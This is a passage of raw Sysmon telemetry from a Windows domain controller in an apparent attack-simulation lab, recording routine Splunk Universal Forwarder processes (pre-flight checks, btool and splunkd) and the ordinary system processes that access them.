Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.071{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.037{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.005{266CAFBE-64EE-6064-E400-00000000AE01}64646452C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.995{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 23542300x80000000000000008334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.923{266CAFBE-64F0-6064-EF00-00000000AE01}6696NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.907{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.907{266CAFBE-64F0-6064-EF00-00000000AE01}66964052C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.652{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.595{266CAFBE-64F0-6064-EE00-00000000AE01}54365448C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-EE00-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-EE00-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-64F0-6064-ED00-00000000AE01}67766780C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64F0-6064-EE00-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program 